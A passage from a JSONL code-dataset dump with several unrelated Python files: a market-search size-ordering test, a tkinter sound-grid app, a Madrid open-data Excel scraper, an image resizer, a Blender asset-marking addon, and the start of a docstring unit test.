value=6),\n GLParam(param_id=205, value=7),\n GLParam(param_id=205, value=8),\n GLParam(param_id=205, value=9),\n GLParam(param_id=205, value=10),\n GLParam(param_id=205, value=11),\n GLParam(param_id=205, value=12),\n GLParam(param_id=206, value=1),\n GLParam(param_id=206, value=2),\n GLParam(param_id=206, value=3),\n ],\n ),\n Offer(\n title='papers',\n hid=102,\n hyperid=601,\n glparams=[\n GLParam(param_id=206, value=1),\n GLParam(param_id=207, value=1),\n GLParam(param_id=207, value=2),\n GLParam(param_id=207, value=3),\n GLParam(param_id=207, value=4),\n ],\n ),\n ]\n\n cls.index.models += [Model(title='shoes', hid=102, hyperid=601)]\n\n def test_value_order(self):\n \"\"\"\n Проверяем порядок следования значений параметров:\n он должен совпадать с порядком по-возрастанию позиций значений параметра (см. выше)\n Одного запроса в прайм достаточно, т.к. логика в репорте работает одна и та же\n \"\"\"\n response = self.report.request_json('place=prime&text=shoes&hid=102')\n self.assertFragmentIn(\n response,\n {\n 'units': [\n {\n 'values': [\n {'unit': 'INT', 'value': 'XS', 'id': '5'},\n {'unit': 'INT', 'value': 'M', 'id': '8'},\n {'unit': 'INT', 'value': 'L', 'id': '7'},\n {'unit': 'INT', 'value': 'XL', 'id': '6'},\n ],\n 'unitId': 'INT',\n 'id': '1',\n },\n {\n 'values': [\n {'unit': 'ROMAN', 'value': 'I', 'id': '9'},\n {'unit': 'ROMAN', 'value': 'V', 'id': '11'},\n {'unit': 'ROMAN', 'value': 'IC', 'id': '10'},\n {'unit': 'ROMAN', 'value': 'C', 'id': '12'},\n ],\n 'unitId': 'ROMAN',\n 'id': '2',\n },\n ]\n },\n preserve_order=True,\n )\n\n def test_value_without_position_fallback(self):\n \"\"\"\n Проверяем порядок следования значений параметров:\n он должен быть в алфавитном порядке, т.к. у значения ddd нет параметра position\n \"\"\"\n response = self.report.request_json('place=prime&text=papers&hid=102')\n self.assertFragmentIn(\n response,\n {\n 'units': [\n {\n 'values': [\n {'unit': 'TEXT', 'value': 'aaa', 'id': '1'},\n {'unit': 'TEXT', 'value': 'bbb', 'id': '2'},\n {'unit': 'TEXT', 'value': 'ccc', 'id': '3'},\n {'unit': 'TEXT', 'value': 'ddd', 'id': '4'},\n ],\n 'unitId': 'TEXT',\n 'id': '3',\n }\n ]\n },\n preserve_order=True,\n )\n\n def test_value_without_position_fallback_popular_filters_exp(self):\n \"\"\"\n Проверяем, что эксперимент market_popular_gl_filters_on_search=1 не сломал размеры (то же, что test_value_without_position_fallback)\n \"\"\"\n response = self.report.request_json(\n 'place=prime&text=papers&hid=102&rearr-factors=market_popular_gl_filters_on_search=1'\n )\n self.assertFragmentIn(\n response,\n {\n 'units': [\n {\n 'values': [\n {'unit': 'TEXT', 'value': 'aaa', 'id': '1'},\n {'unit': 'TEXT', 'value': 'bbb', 'id': '2'},\n {'unit': 'TEXT', 'value': 'ccc', 'id': '3'},\n {'unit': 'TEXT', 'value': 'ddd', 'id': '4'},\n ],\n 'unitId': 'TEXT',\n 'id': '3',\n }\n ]\n },\n preserve_order=True,\n )\n\n @classmethod\n def prepare_original_params(cls):\n \"\"\"\n Создаем русскую размерную сетку с двумя значениями размеров: 32 и 34 и интернациональную с XL\n Создаем оффер с размерами 32 и 34, и с оригинальными значениями 32 и XL\n Создаем оффер с размерами 32 и 34 и без оригинальных значений.\n \"\"\"\n cls.index.gltypes += [\n GLType(\n param_id=210,\n hid=103,\n gltype=GLType.ENUM,\n subtype='size',\n cluster_filter=True,\n unit_param_id=211,\n name='size',\n values=[\n GLValue(value_id=1, text='32', unit_value_id=2),\n GLValue(value_id=2, text='34', unit_value_id=2),\n GLValue(value_id=3, text='XL', unit_value_id=3),\n ],\n ),\n GLType(\n param_id=211,\n hid=103,\n gltype=GLType.ENUM,\n name='size_units',\n position=None,\n values=[\n GLValue(value_id=2, text='RU', default=True),\n GLValue(value_id=3, text='INT'),\n ],\n ),\n ]\n\n cls.index.offers += [\n Offer(\n title='with-originals',\n hid=103,\n vclusterid=1000000003,\n glparams=[\n GLParam(param_id=210, value=1),\n GLParam(param_id=210, value=2),\n ],\n original_glparams=[GLParam(param_id=210, value=1), GLParam(param_id=210, value=3)],\n ),\n Offer(\n title='without-originals',\n hid=103,\n vclusterid=1000000003,\n glparams=[\n GLParam(param_id=210, value=1),\n GLParam(param_id=210, value=3),\n ],\n ),\n ]\n\n cls.index.vclusters += [VCluster(title='pants', hid=103, vclusterid=1000000003)]\n\n cls.settings.is_archive_new_format = True\n\n def test_original_params(self):\n \"\"\"\n Проверяем, что в выдаче присутствует информация об оригинальном размере (32 и XL) у оффера с оригинальными\n значениями, и что оригинальных значений не показывается у оффера без оригинальных значений.\n Выдача экспериментальная, т.е. не обсуждаемая с фронтом и имеет цель, что репорт МОЖЕТ пробросить\n оригинальный размер\n \"\"\"\n response = self.report.request_json('place=productoffers&hid=103&hyperid=1000000003')\n self.assertFragmentIn(\n response,\n [\n {\n 'entity': 'offer',\n 'titles': {\n 'raw': \"with-originals\",\n },\n 'experimentalOriginalParams': [{'param': 'size', 'value': '32'}, {'param': 'size', 'value': 'XL'}],\n },\n {\n 'entity': 'offer',\n 'titles': {\n 'raw': \"without-originals\",\n },\n 'experimentalOriginalParams': Absent(),\n },\n ],\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/GENERAL/test_sizes_new.py","file_name":"test_sizes_new.py","file_ext":"py","file_size_in_byte":21684,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7810909269","text":"import wave\nimport pyaudio\nfrom tkinter import *\nimport time\n\n#number of possible sounds, rows*cols\nrows = 10\ncols = 10\nSoundMatrix = []\n# This function defines the limits for the tempo used (a value above 200 simply does not make a difference)\ndef limit_bpms(* args):\n\tglobal bpms\n\tprint(bpms.get())\n\tif int(bpms.get()) < 20:\n\t\tbpms.set(20)\n\tif int(bpms.get()) > 200:\n\t\tbpms.set(200)\n\n# This funciton is the main one for playing the sound loop.\n# It is kinda strangly written, but what it does is take a background sound, and take all the sounds selected (stored in the argument path)\n# Then for each chunk of each sound play it sequencial (this is done to mix the sounds without using a bunch load of threads, also threads and tkinter do not combine very well in my experience)\ndef playsound(path,a):\n\t#define stream chunk \n\tchunk = 1024\n\tstream = []\n\treadable = []\n\tfor i in path:\n\t\tnew = str(i)+\".wav\"\n\t\t#open a wav format music \n\t\tf = wave.open(new,\"rb\") \n\t\t#instantiate PyAudio \n\t\tp = pyaudio.PyAudio() \n\t\t#open stream \n\t\tstream.append(p.open(format = p.get_format_from_width(f.getsampwidth()), \n\t\t channels = f.getnchannels(), \n\t\t rate = f.getframerate(), \n\t\t output = True))\n\t\treadable.append(f)\n\n\tbackground = \"beat.wav\"\n\tb = wave.open(background,\"rb\")\n\tp = pyaudio.PyAudio()\n\tbackstream = p.open(format = p.get_format_from_width(b.getsampwidth()),\n\t\t\t\t\tchannels = b.getnchannels(),\n\t\t\t\t\trate = b.getframerate(),\n\t\t\t\t\toutput = True)\n\taux = readable[0].readframes(chunk)\n\tstream[0].write(aux)\n\tcounter = 0\n\tnow = time.time()\n\tstart = now\n\twhile aux:\n\t\ta.update_idletasks()\n\t\ta.update()\n\t\t#check for a minute/bpms have passed\n\t\tif (now-start) >= 60/bpms.get():\n\t\t\tbreak\n\t\tmetronome = b.readframes(chunk)\n\t\tbackstream.write(metronome)\n\t\tfor i in readable:\n\t\t\taux = i.readframes(chunk)\n\t\t\tstream[counter].write(aux)\n\t\t\tcounter += 1\n\t\tcounter=0\n\t\tnow = time.time()\n\n\tfor s in stream:\n\t\t#stop streams \n\t\ts.stop_stream() \n\t\ts.close() \n\n\tbackstream.stop_stream()\n\tbackstream.close()\n\t#close PyAudio \n\tp.terminate() \n\n# This function is activated with the right click and will replace the current sound of the clicked button for a new one\n# This function does not terminate the recording, only when the mouse is released the stoprecording is called\ndef recordingsound():\n\tglobal audio,frames, stream\n\tFORMAT = pyaudio.paInt16\n\tCHANNELS = 2\n\tRATE = 44100\n\tCHUNK = 1024\n\tRECORD_SECONDS = 0.5\n\t \n\taudio = pyaudio.PyAudio()\n\t \n\t# start Recording\n\tstream = audio.open(format=FORMAT, channels=CHANNELS,\n\t rate=RATE, input=True,\n\t frames_per_buffer=CHUNK)\n\tprint(\"recording...\")\n\tframes = []\n\t \n\tfor i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):\n\t data = stream.read(CHUNK)\n\t frames.append(data)\n\n# This function will terminate the recording of given button\n# only the argument b is used (the button id), argument e is just to catch the event Object\ndef stoprecording(e,b):\n\tglobal audio,frames,stream\n\tFORMAT = pyaudio.paInt16\n\tCHANNELS = 2\n\tRATE = 44100\n\tCHUNK = 1024\n\tRECORD_SECONDS = 5\n\tWAVE_OUTPUT_FILENAME = str(b)+\".wav\"\n\t \n\tprint(\"finished recording\")\n\t \n\t \n\t# stop Recording\n\tstream.stop_stream()\n\tstream.close()\n\taudio.terminate()\n\t \n\twaveFile = wave.open(WAVE_OUTPUT_FILENAME, 'wb')\n\twaveFile.setnchannels(CHANNELS)\n\twaveFile.setsampwidth(audio.get_sample_size(FORMAT))\n\twaveFile.setframerate(RATE)\n\twaveFile.writeframes(b''.join(frames))\n\twaveFile.close()\n\n#function to check which buttons are activated (the ones with a red background)\ndef convertMatrixtosound():\n\tglobal SoundMatrix\n\tplaying = []\n\tcounter = 0\n\tfor a in SoundMatrix:\n\t\tif a[\"highlightbackground\"] == 'red':\n\t\t\tplaying.append(counter)\n\t\tcounter += 1\n\treturn playing\n\n#function to toggle each buttons color (deactivate - blue, activate - red).\n#This function also enables the starting button\ndef loadsound(row,col):\n\tglobal cols, SoundMatrix, starting_but\n\n\tif SoundMatrix[row*cols+col].config()[\"highlightbackground\"][4] == 'blue':\n\t\tSoundMatrix[row*cols+col].config(highlightbackground=\"red\")\n\t\tstarting_but.config(state=\"active\")\n\telse:\n\t\tSoundMatrix[row*cols+col].config(highlightbackground=\"blue\")\n\n# this function will be triggered every time the \"start making music\" button is clicked.\n# It only receives the argument \"app\" to later on pass to the \"playsound()\" function (its pretty dumb I know, it was to avoid excessive global variables (which there are already plenty of) )\n# Flag is to start/stop the loop\ndef loadsoundmatrix(app):\n\tglobal bpms, starting_but,flag\n\tif starting_but.cget(\"text\") != \"Stop the loop!\":\n\t\tstarting_but.config(text=\"Stop the loop!\",state=\"active\")\n\t\tflag = 0\n\telse:\n\t\tflag = 1\n\twhile flag == 0:\n\t\tsounds=convertMatrixtosound()\n\t\tprint(sounds)\n\t\tplaysound(sounds,app)\n\tstarting_but.config(text=\"Start making music!\",state=\"active\")\n\n#Main function\n#Defines all the graphical components through tkinter\n#Binds all the sound buttons to the previously defined functions\ndef main():\n\tglobal rows, cols, SoundMatrix,starting_but, bpms,flag\n\tflag = 0\n\troot = Tk()\n\tw, h = root.winfo_screenwidth(), root.winfo_screenheight()\n\troot.title(\"Sound table\")\n\tmainframe = Frame(root)\n\tmainframe.pack(fill=\"both\", expand=1)\n\tbpms = IntVar()\n\tbpms.set(60)\n\tLabel(mainframe, text=\"Welcome to the digital sound table!\",font='Helvetica 18 bold').pack()\n\tLabel(mainframe, text=\"\\nPlease select the tempo (bpms)\").pack()\n\tentry_bpms = Entry(mainframe, textvariable=bpms,width=5)\n\tentry_bpms.bind(\"\",limit_bpms)\n\tentry_bpms.pack()\n\tgridframe = Frame(root)\n\tfor r in range(0,rows):\n\t\tfor c in range(0,cols):\n\t\t\tbut = Button(gridframe,text=\"\\t\\n\\t\\n\",command = lambda ro=r,co=c: loadsound(ro,co),highlightbackground=\"blue\")\n\t\t\tbut.grid(row=r,column=c)\n\t\t\tbut.bind(\"\",lambda id_but=int(r*cols+c): recordingsound(id_but))\n\t\t\tbut.bind(\"\",lambda e,id_but=int(r*cols+c): stoprecording(e,id_but))\n\t\t\tSoundMatrix.append(but)\n\tgridframe.pack(fill=\"both\", expand=1)\n\ttimeframe = Frame(root)\n\tstarting_but = Button(timeframe, text=\"Start making music!\",command = lambda: loadsoundmatrix(root),state=\"disabled\")\n\tstarting_but.pack()\n\ttimeframe.pack(fill=\"both\", expand=1)\n\twhile True:\n\t\troot.update_idletasks()\n\t\troot.update()\n\n# Used so this script can be imported later on as module\nif __name__ == \"__main__\":\n\tmain()","repo_name":"henriquefig/Sound-table","sub_path":"soundtable.py","file_name":"soundtable.py","file_ext":"py","file_size_in_byte":6332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"42031394383","text":"#-*- coding=utf-8 -*-\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport wget\n\ninit = 'http://datos.madrid.es'\nurl = 'https://datos.madrid.es/portal/site/egob/menuitem.c05c1f754a33a9fbe4b2e4b284f1a5a0/?vgnextoid=bffff1d2a9fdb410VgnVCM2000000c205a0aRCRD&vgnextchannel=374512b9ace9f310VgnVCM100000171f5a0aRCRD&vgnextfmt=default'\npage = requests.get(url)\nprint(page.text)\n\nsoup = BeautifulSoup(page.text, 'html.parser')\n\nentradas = soup.find_all(class_='asociada-link ico-xlsx')\nprint(entradas)\n\nlink = entradas[0].get('href') # esto devuelve el link del ultimo mes\n\nexcel = init + link\nfilename = wget.download(excel, out='./excel/')\nprint(filename)\n\n\n\n\n\n\n","repo_name":"MadAlert/TFG","sub_path":"Python/WebScraping/obtenerExcel.py","file_name":"obtenerExcel.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13514053499","text":"import glob\nimport pathlib \nfrom PIL import Image\nmainfolder = input(\"Input folder: \") \n\np = pathlib.Path(\"{}/\".format(mainfolder))\n\ndef compress(img_file):\n print(img_file)\n basewidth = 1920\n img = Image.open(img_file)\n wpercent = (basewidth/float(img.size[0]))\n hsize = int((float(img.size[1])*float(wpercent)))\n img = img.resize((basewidth,hsize), Image.ANTIALIAS)\n img.save(img_file)\n\nfor img_file in p.rglob(\"*.png\"):\n compress(img_file)\n\nfor img_file in p.rglob(\"*.jpg\"):\n compress(img_file)\n\nfor img_file in p.rglob(\"*.jpeg\"):\n compress(img_file)","repo_name":"manolaz/formal-image","sub_path":"photocomp.py","file_name":"photocomp.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1563214615","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\nimport bpy\nimport os \nfrom subprocess import run\nfrom bpy.types import AddonPreferences, Operator, Panel\nfrom bpy.props import BoolProperty, StringProperty, EnumProperty, IntProperty\n\n\nbl_info = {\n \"name\": \"Asset Marker\",\n \"description\": \"Mark Assets in .blend files\",\n \"author\": \"Daniel Grauer\",\n \"version\": (1, 2, 5),\n \"blender\": (3, 0, 0),\n \"location\": \"Sidebar\",\n \"category\": \"System\",\n \"wiki_url\": \"https://github.com/kromar/blender_AssetMarker\",\n \"tracker_url\": \"https://github.com/kromar/blender_AssetMarker/issues\",\n}\n\n\ndef prefs():\n ''' load addon preferences to reference in code'''\n user_preferences = bpy.context.preferences\n return user_preferences.addons[__package__].preferences \n\n\nclass AM_PT_AssetMarker(Panel): \n bl_label = 'Asset Marker'\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'UI'\n bl_category = 'Asset Marker' \n\n def draw(self, context): \n current_file = prefs().current_file.replace(\",\", \" \").split()\n layout = self.layout \n for i in current_file: \n layout.operator(operator=\"scene.asset_marker\", text=i, icon='ASSET_MANAGER', emboss=True, depress=False).button_input=i\n layout.separator()\n\n\nclass AssetMarker(Operator):\n bl_idname = \"scene.asset_marker\"\n bl_label = \"asset_marker\"\n bl_description = \"mark assets\"\n \n button_input: StringProperty()\n \n asset_marked: BoolProperty(\n name=\"asset_marked\",\n description=\"asset_marked\",\n default=False)\n \n mesh_type: BoolProperty(\n name=\"mesh_type\",\n description=\"mesh_type\",\n default=False)\n\n\n def execute(self, context): \n #print(\"button_input: \", self.button_input)\n if self.asset_marked:\n self.asset_marked = False\n else:\n self.asset_marked = True \n self.mark_asset(self.asset_marked) \n\n return{'FINISHED'}\n \n\n def mark_asset(self, state = False): \n\n if self.button_input == 'Mark_Objects': \n for ob in bpy.data.objects:\n if state:\n self.mark_assets(ob) \n else:\n self.clear_assets(ob) \n elif self.button_input == 'Mark_Materials':\n for ob in bpy.data.materials:\n if state:\n self.mark_assets(ob) \n else:\n self.clear_assets(ob)\n elif self.button_input == 'Mark_Poses':\n for ob in bpy.data.actions:\n if state:\n self.mark_assets(ob) \n else:\n self.clear_assets(ob)\n elif self.button_input == 'Mark_Worlds':\n for ob in bpy.data.worlds:\n if state:\n self.mark_assets(ob) \n else:\n self.clear_assets(ob)\n\n \n def mark_assets(self, asset):\n if prefs().debug_mode:\n print(' marking: ', asset.name)\n asset.asset_mark() \n asset.asset_generate_preview()\n\n def clear_assets(self, asset):\n if prefs().debug_mode:\n print(' clearing: ', asset.name) \n asset.asset_clear()\n asset.use_fake_user = True\n \n \n \nclass AssetWalker(Operator):\n bl_idname = \"scene.asset_walker\"\n bl_label = \"Mark Assets\"\n bl_description = \"mark library assets\"\n \n blender_path = bpy.app.binary_path\n addon_path = os.path.abspath(os.path.dirname(__file__))\n script_path = os.path.join(addon_path, 'mark_assets.py') \n \n button_input: StringProperty() \n library_index: IntProperty()\n\n def execute(self, context): \n print(\"\\nRun Asset Crawler\")\n self.asset_crawler(context) \n return{'FINISHED'}\n\n def convert_args_to_cmdlist(self):\n arg_list = []\n if prefs().mark_objects:\n arg_list.append('mark_object') \n \n if prefs().mark_mesh:\n arg_list.append('mark_mesh')\n else: \n arg_list.append('clear_mesh')\n if prefs().mark_surface:\n arg_list.append('mark_surface')\n else: \n arg_list.append('clear_surface')\n if prefs().mark_meta:\n arg_list.append('mark_meta')\n else: \n arg_list.append('clear_meta')\n if prefs().mark_curve:\n arg_list.append('mark_curve')\n else: \n arg_list.append('clear_curve')\n if prefs().mark_font:\n arg_list.append('mark_font')\n else: \n arg_list.append('clear_font')\n if prefs().mark_curves:\n arg_list.append('mark_curves')\n else: \n arg_list.append('clear_curves')\n if prefs().mark_pointcloud:\n arg_list.append('mark_pointcloud')\n else: \n arg_list.append('clear_pointcloud')\n if prefs().mark_volume:\n arg_list.append('mark_volume')\n else: \n arg_list.append('clear_volume')\n if prefs().mark_greasepencil:\n arg_list.append('mark_greasepencil')\n else: \n arg_list.append('clear_greasepencil')\n if prefs().mark_armature:\n arg_list.append('mark_armature')\n else: \n arg_list.append('clear_armature')\n if prefs().mark_lattice:\n arg_list.append('mark_lattice')\n else: \n arg_list.append('clear_lattice')\n if prefs().mark_empty:\n arg_list.append('mark_empty')\n else: \n arg_list.append('clear_empty')\n if prefs().mark_light:\n arg_list.append('mark_light')\n else: \n arg_list.append('clear_light')\n if prefs().mark_lightprobe:\n arg_list.append('mark_lightprobe')\n else: \n arg_list.append('clear_lightprobe')\n if prefs().mark_camera:\n arg_list.append('mark_camera')\n else: \n arg_list.append('clear_camera')\n if prefs().mark_speaker:\n arg_list.append('mark_speaker')\n else: \n arg_list.append('clear_speaker')\n\n else: \n arg_list.append('clear_object')\n\n\n if prefs().mark_materials:\n arg_list.append('materials_mark')\n else: \n arg_list.append('materials_clear')\n\n if prefs().mark_poses:\n arg_list.append('poses_mark')\n else: \n arg_list.append('poses_clear')\n\n if prefs().mark_worlds:\n arg_list.append('worlds_mark')\n else: \n arg_list.append('worlds_clear')\n\n asset_type = ' '.join([str(item) for item in arg_list])\n #print(arg_list)\n #print(asset_type)\n return asset_type\n\n\n def asset_crawler(self, context):\n # iterating over directory and subdirectory to find all blender files \n # and mark the desired assets\n\n asset_type = self.convert_args_to_cmdlist()\n\n paths = context.preferences.filepaths\n #print(\"Asset Library: \", paths.asset_libraries[self.library_index].name)\n lib_path = paths.asset_libraries[self.library_index].path\n\n for path, dirc, files in os.walk(lib_path): \n for name in files:\n if name.endswith('.blend'):\n try: \n blend_path = os.path.join(path, name)\n print(\"Opening Asset Library: \", blend_path) #0\n #\"\"\" \n run([self.blender_path, \n blend_path, \n '--background', \n '--factory-startup',\n '--python', \n self.script_path, \n '--', \n str(prefs().debug_mode), #0\n asset_type, #1\n ], shell=False) \n #\"\"\" \n \n except:\n print(\"cant open %s, file corrupt?\" % name) \n \n for window in bpy.context.window_manager.windows:\n screen = window.screen\n for area in screen.areas:\n if area.type == 'FILE_BROWSER': \n #bpy.ops.asset.catalog_new(parent_path='')\n #bpy.ops.asset.library_refresh()\n pass\n #print(\"amount of files\", len(files)) \n\n \"\"\" \n progress_total = len(files)\n wm = bpy.context.window_manager\n wm.progress_begin(0, progress_total) \n for i in range(progress_total):\n wm.progress_update(i) \n print(i)\n wm.progress_end() \n #\"\"\"\n\n return{'FINISHED'}\n\n\nclass AssetMarkerPreferences(AddonPreferences):\n bl_idname = __package__\n \n current_file: StringProperty(\n name=\"current_file\", \n description=\"current_file\", \n subtype='NONE',\n default=\"Mark_Objects, Mark_Materials, Mark_Poses, Mark_Worlds\",\n update=AM_PT_AssetMarker.draw)\n\n mark_objects: bpy.props.BoolProperty(\n name=\"Objects\",\n description=\"All Objects will be marked as Assets\",\n default=True) \n \n custom_object_types: bpy.props.BoolProperty(\n name=\"Configure Object Types\",\n description=\"debug_mode\",\n default=False) \n\n mark_mesh: bpy.props.BoolProperty(\n name=\"Mesh\",\n description=\"All Meshes will be marked as Assets\",\n default=True) \n mark_surface: bpy.props.BoolProperty(\n name=\"Surface\",\n description=\"All Surfaces will be marked as Assets\",\n default=True) \n mark_meta: bpy.props.BoolProperty(\n name=\"Meta\",\n description=\"All Metas will be marked as Assets\",\n default=True) \n\n\n mark_curve: bpy.props.BoolProperty(\n name=\"Curve\",\n description=\"All Curves will be marked as Assets\",\n default=True) \n mark_font: bpy.props.BoolProperty(\n name=\"Font\",\n description=\"All Fonts will be marked as Assets\",\n default=True) \n mark_curves: bpy.props.BoolProperty(\n name=\"Curves\",\n description=\"All Curves will be marked as Assets\",\n default=True) \n mark_pointcloud: bpy.props.BoolProperty(\n name=\"Pointcloud\",\n description=\"All Pointclouds will be marked as Assets\",\n default=True) \n mark_volume: bpy.props.BoolProperty(\n name=\"Volume\",\n description=\"All Volumes will be marked as Assets\",\n default=True) \n mark_greasepencil: bpy.props.BoolProperty(\n name=\"Grease Pencil\",\n description=\"All Grease Pencils will be marked as Assets\",\n default=True) \n mark_armature: bpy.props.BoolProperty(\n name=\"Armatures\",\n description=\"All Armatures will be marked as Assets\",\n default=True) \n mark_lattice: bpy.props.BoolProperty(\n name=\"Lattice\",\n description=\"All Lattices will be marked as Assets\",\n default=True) \n mark_empty: bpy.props.BoolProperty(\n name=\"Empties\",\n description=\"All Empties will be marked as Assets\",\n default=True) \n mark_light: bpy.props.BoolProperty(\n name=\"Light\",\n description=\"All Lights will be marked as Assets\",\n default=True) \n mark_lightprobe: bpy.props.BoolProperty(\n name=\"Lightprobe\",\n description=\"All Lightprobes will be marked as Assets\",\n default=True) \n mark_camera: bpy.props.BoolProperty(\n name=\"Camera\",\n description=\"All Cameras will be marked as Assets\",\n default=True) \n mark_speaker: bpy.props.BoolProperty(\n name=\"Speaker\",\n description=\"All Speakers will be marked as Assets\",\n default=True) \n \n\n mark_materials: bpy.props.BoolProperty(\n name=\"Materials\",\n description=\"All Materials will be marked as Assets\",\n default=True) \n mark_poses: bpy.props.BoolProperty(\n name=\"Poses\",\n description=\"All Poses will be marked as Assets\",\n default=False) \n mark_worlds: bpy.props.BoolProperty(\n name=\"Worlds\",\n description=\"All Worlds will be marked as Assets\",\n default=False) \n \n debug_mode: bpy.props.BoolProperty(\n name=\"debug_mode\",\n description=\"debug_mode\",\n default=False) \n \n \n \n def draw(self, context):\n layout = self.layout\n layout.use_property_split = False \n layout.prop(self, 'debug_mode') \n \n #asset libraries\n paths = context.preferences.filepaths\n box = layout.box()\n row = box.row()\n box.label(text='Asset Libraries')\n split = box.split(factor=0.3)\n name_col = split.column()\n path_col = split.column()\n asset_col = split.column()\n\n row = name_col.row(align=True) # Padding\n row.separator()\n row.label(text=\"Name\")\n\n row = path_col.row(align=True) # Padding\n row.separator()\n row.label(text=\"Path\")\n\n row = asset_col.row(align=True) # Padding\n row.separator()\n row.label(text=\"Asset Marker\")\n\n for i, library in enumerate(paths.asset_libraries):\n name_col.prop(library, \"name\", text=\"\")\n row = path_col.row()\n row.prop(library, \"path\", text=\"\") \n row = asset_col.row() \n row.operator(operator=\"scene.asset_walker\", icon='ASSET_MANAGER', emboss=True, depress=False).library_index = i\n row.operator(\"preferences.asset_library_remove\", text=\"\", icon='TRASH', emboss=True).index = i\n \n row = box.row()\n row.alignment = 'LEFT'\n row.operator(\"preferences.asset_library_add\", text=\"\", icon='ADD', emboss=False)\n \n\n # Asset Marker selection\n box = layout.box() \n box.label(text='Asset Marker Configuration') \n col = box.column()\n split = col.split() \n col1 = split.column() \n col2 = split.column() \n col3 = split.column() \n\n col1.prop(self, 'mark_objects',icon = 'OBJECT_DATA')\n if self.mark_objects:\n col1.prop(self, 'custom_object_types')\n col1 = col1.column(align=True) \n if self.custom_object_types:\n col1.prop(self, 'mark_mesh',icon = 'OUTLINER_OB_MESH')\n col1.prop(self, 'mark_surface',icon = 'OUTLINER_OB_SURFACE')\n col1.prop(self, 'mark_meta',icon = 'OUTLINER_OB_META')\n col1.prop(self, 'mark_curve',icon = 'OUTLINER_OB_CURVE')\n col1.prop(self, 'mark_font',icon = 'OUTLINER_OB_FONT')\n if bpy.app.version >= (3,2,0):\n col1.prop(self, 'mark_curves',icon = 'OUTLINER_OB_CURVES')\n col1.prop(self, 'mark_pointcloud',icon = 'OUTLINER_OB_POINTCLOUD')\n col1.prop(self, 'mark_volume',icon = 'OUTLINER_OB_VOLUME')\n col1.prop(self, 'mark_greasepencil',icon = 'OUTLINER_OB_GREASEPENCIL')\n col1.prop(self, 'mark_armature',icon = 'OUTLINER_OB_ARMATURE')\n col1.prop(self, 'mark_lattice',icon = 'OUTLINER_OB_LATTICE')\n col1.prop(self, 'mark_empty',icon = 'OUTLINER_OB_EMPTY')\n col1.prop(self, 'mark_light',icon = 'OUTLINER_OB_LIGHT')\n col1.prop(self, 'mark_lightprobe',icon = 'OUTLINER_OB_LIGHTPROBE')\n col1.prop(self, 'mark_camera',icon = 'OUTLINER_OB_CAMERA')\n col1.prop(self, 'mark_speaker',icon = 'OUTLINER_OB_SPEAKER')\n \n col2.prop(self, 'mark_materials', icon = 'MATERIAL')\n col2.prop(self, 'mark_worlds', icon = 'WORLD')\n col3.prop(self, 'mark_poses', icon = 'POSE_HLT')\n\n #template_list(listtype_name, list_id, dataptr, propname, active_dataptr, active_propname, item_dyntip_propname='', rows=5, maxrows=5, type='DEFAULT', columns=9, sort_reverse=False, sort_lock=False)\n\n\n\nclasses = (\n AssetMarker,\n AssetWalker,\n AM_PT_AssetMarker,\n AssetMarkerPreferences,\n )\n\n\ndef register(): \n [bpy.utils.register_class(c) for c in classes]\n\n\ndef unregister():\n [bpy.utils.unregister_class(c) for c in classes]\n\n\nif __name__ == \"__main__\":\n register()\n","repo_name":"kromar/blender_AssetMarker","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":18117,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"37712136888","text":"import unittest\nimport re\n\nfrom pywrapper import m_circle\n\ncircle_radius = 1.5\nball_radius = 2.5\nsquare_size = 3.\nprecision = 1e-7\n\ndef clean_str(in_str):\n docstring_lines = in_str.split('\\n')\n for i,line in enumerate(docstring_lines):\n docstring_lines[i] = line.strip(' \\n\\t')\n docstring_lines[i] = re.sub('Defined at main\\\\.f90 lines \\\\d+-\\\\d+', '', docstring_lines[i])\n return '\\n'.join(docstring_lines)\n\nclass TestDocstring(unittest.TestCase):\n\n def test_module_doc(self):\n circle = m_circle.t_circle()\n docstring = m_circle.__doc__\n ref_docstring = \"\"\"\n Module m_circle\n\n\n Defined at main.f90 lines 7-89\n\n File: main.f90\n Brief: Test program docstring\n Author: test_author\n Copyright: test_copyright\n \"\"\"\n\n assert clean_str(ref_docstring) == clean_str(docstring)\n\n def test_docstring(self):\n circle = m_circle.t_circle()\n docstring = m_circle.construct_circle.__doc__\n ref_docstring = \"\"\"\n construct_circle(self, radius)\n\n\n Defined at main.f90 lines 17-20\n\n Parameters\n ----------\n circle : T_Circle, [in,out] t_circle to initialize\n radius : float, [in] radius of the circle\n\n Brief: Initialize circle\n \"\"\"\n\n assert clean_str(ref_docstring) == clean_str(docstring)\n\n def test_no_direction(self):\n circle = m_circle.t_circle()\n docstring = m_circle.no_direction.__doc__\n ref_docstring = \"\"\"\n no_direction(self, radius)\n\n\n Defined at main.f90 lines 28-31\n\n Parameters\n ----------\n circle : T_Circle, t_circle to initialize\n radius : float, radius of the circle\n\n Brief: Without direction\n \"\"\"\n\n assert clean_str(ref_docstring) == clean_str(docstring)\n\n def test_docstring_incomplet(self):\n circle = m_circle.t_circle()\n docstring = m_circle.incomplete_doc_sub.__doc__\n 